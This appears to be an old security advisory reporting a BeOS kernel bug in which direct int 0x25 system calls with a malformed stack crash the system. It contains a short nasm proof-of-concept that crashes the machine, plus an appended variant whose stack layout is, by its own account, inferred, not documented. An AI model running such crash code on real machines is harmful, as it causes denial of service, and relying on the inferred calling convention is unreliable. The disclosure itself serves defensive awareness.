COMMAND

    kernel

SYSTEMS AFFECTED

    BeOS

PROBLEM

    Konstantin Boldyshev found the following BeOS crashes, which are
    triggered when a system call is issued with invalid parameters.

    When using direct kernel calls through int 0x25 (rather than the
    libroot.so functions), BeOS dies on most system calls issued with
    invalid parameters or an invalid stack. Although Be had registered
    this bug before R5.0, it is still present in R5.0 and in at least
    all R4.5.x releases:

        http://bebugs.be.com/devbugs/detail.php3?oid=2324160

    Here's a sample assembly program that kills BeOS (nasm):

    section .text
    global _start

    _start:

            push    dword msg
            push    dword len
            push    dword 1         ;stdout

            mov     eax,3           ;sys_write
            int     0x25            ;must be a *call* to int 0x25,
                                    ;then everything goes ok; i.e.
                                    ;return address must be on the stack,
                                    ;but it is not

            mov     eax,0x3f        ;sys_exit
            int     0x25

    msg     db      "hello",0xa
    len     equ     $ - msg

    Source and binary can be downloaded at:

        http://linuxassembly.org/BeDie.tgz
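
    For comparison, the same program written the way the comment in the
    sample describes, reaching int 0x25 through a call so that a return
    address sits on the stack above the arguments. This is an added
    example, not part of the original report or the BeDie.tgz archive; the
    stub name do_syscall is made up here, the syscall numbers and pushed
    arguments are taken unchanged from the sample above, and the assumed
    stack layout (return address at [esp], arguments after it) is inferred
    from that comment rather than from Be documentation.

```nasm
section .text
global _start

; Assumed stub: the kernel is reached only through a call, so [esp]
; holds a return address and the pushed arguments follow it.
; (Layout inferred from the advisory's comment, not a documented ABI.)
do_syscall:
        int     0x25
        ret

_start:
        push    dword msg
        push    dword len
        push    dword 1         ; stdout (arguments as in the sample)

        mov     eax,3           ; sys_write (number from the sample)
        call    do_syscall      ; call, not a bare int 0x25
        add     esp,12          ; caller removes the three arguments

        mov     eax,0x3f        ; sys_exit (number from the sample)
        call    do_syscall

msg     db      "hello",0xa
len     equ     $ - msg
```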

SOLUTION

    No fix is available; it is a kernel bug.